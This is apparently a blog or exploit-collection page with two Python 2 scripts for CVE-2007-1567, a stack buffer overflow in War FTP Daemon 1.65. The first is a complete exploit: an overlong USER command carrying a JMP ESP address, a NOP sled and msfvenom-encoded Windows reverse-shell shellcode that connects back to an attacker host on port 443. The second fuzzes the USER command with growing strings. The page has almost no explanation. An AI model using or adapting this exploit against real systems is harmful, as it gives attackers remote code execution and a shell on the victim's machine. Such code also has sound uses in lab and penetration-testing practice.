CVE-2007-1567_War_FTP_Daemon_1.65堆棧緩衝區溢出漏洞

# CVE-2007-1567 War FTP Daemon 1.65堆棧緩衝區溢出漏洞
==warftp-ftp.py==

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# 774699BF   FFE4             JMP ESP

# bad characters \x00\x0a\x0d 

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.123 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows

shellcode = ("\xd9\xed\xba\xda\x93\x0e\xa1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x52\x31\x55\x17\x83\xc5\x04\x03\x8f\x80\xec\x54\xd3\x4f\x72"
"\x96\x2b\x90\x13\x1e\xce\xa1\x13\x44\x9b\x92\xa3\x0e\xc9\x1e"
"\x4f\x42\xf9\x95\x3d\x4b\x0e\x1d\x8b\xad\x21\x9e\xa0\x8e\x20"
"\x1c\xbb\xc2\x82\x1d\x74\x17\xc3\x5a\x69\xda\x91\x33\xe5\x49"
"\x05\x37\xb3\x51\xae\x0b\x55\xd2\x53\xdb\x54\xf3\xc2\x57\x0f"
"\xd3\xe5\xb4\x3b\x5a\xfd\xd9\x06\x14\x76\x29\xfc\xa7\x5e\x63"
"\xfd\x04\x9f\x4b\x0c\x54\xd8\x6c\xef\x23\x10\x8f\x92\x33\xe7"
"\xed\x48\xb1\xf3\x56\x1a\x61\xdf\x67\xcf\xf4\x94\x64\xa4\x73"
"\xf2\x68\x3b\x57\x89\x95\xb0\x56\x5d\x1c\x82\x7c\x79\x44\x50"
"\x1c\xd8\x20\x37\x21\x3a\x8b\xe8\x87\x31\x26\xfc\xb5\x18\x2f"
"\x31\xf4\xa2\xaf\x5d\x8f\xd1\x9d\xc2\x3b\x7d\xae\x8b\xe5\x7a"
"\xd1\xa1\x52\x14\x2c\x4a\xa3\x3d\xeb\x1e\xf3\x55\xda\x1e\x98"
"\xa5\xe3\xca\x0f\xf5\x4b\xa5\xef\xa5\x2b\x15\x98\xaf\xa3\x4a"
"\xb8\xd0\x69\xe3\x53\x2b\xfa\xcc\x0c\x32\x81\xa4\x4e\x34\x74"
"\x8e\xc6\xd2\x1c\xe0\x8e\x4d\x89\x99\x8a\x05\x28\x65\x01\x60"
"\x6a\xed\xa6\x95\x25\x06\xc2\x85\xd2\xe6\x99\xf7\x75\xf8\x37"
"\x9f\x1a\x6b\xdc\x5f\x54\x90\x4b\x08\x31\x66\x82\xdc\xaf\xd1"
"\x3c\xc2\x2d\x87\x07\x46\xea\x74\x89\x47\x7f\xc0\xad\x57\xb9"
"\xc9\xe9\x03\x15\x9c\xa7\xfd\xd3\x76\x06\x57\x8a\x25\xc0\x3f"
"\x4b\x06\xd3\x39\x54\x43\xa5\xa5\xe5\x3a\xf0\xda\xca\xaa\xf4"
"\xa3\x36\x4b\xfa\x7e\xf3\x6b\x19\xaa\x0e\x04\x84\x3f\xb3\x49"
"\x37\xea\xf0\x77\xb4\x1e\x89\x83\xa4\x6b\x8c\xc8\x62\x80\xfc"
"\x41\x07\xa6\x53\x61\x02")

buffer = "A" * 485 + "\xbf\x99\x46\x77" + "\x90" * 20 + shellcode + "C" * (5500-485-4)

try:
	print "\nSending evil buffer..."
	s.connect(("192.168.1.131", 21))
	s.recv(1024)
	s.send('USER ' + buffer + '\r\n')
	data=s.recv(1024)
	print "\nDone!."
except:
	print "Could not connect to FTP!"
	

==ftp-user-fuzz.py==

#!/usr/bin/python

import socket

buffer = ["A"]
counter=100

while len(buffer) < 30:
	buffer.append("A"*counter)
	counter=counter+200

for string in buffer:
	print "Fuzzing USER with %s bytes" % len(string)
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect(("192.168.1.131", 21))
	s.recv(1024)
	s.send('USER ' + string + '\r\n')
	s.recv(1024)
	s.send('QUIT\r\n')
	s.close()


© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容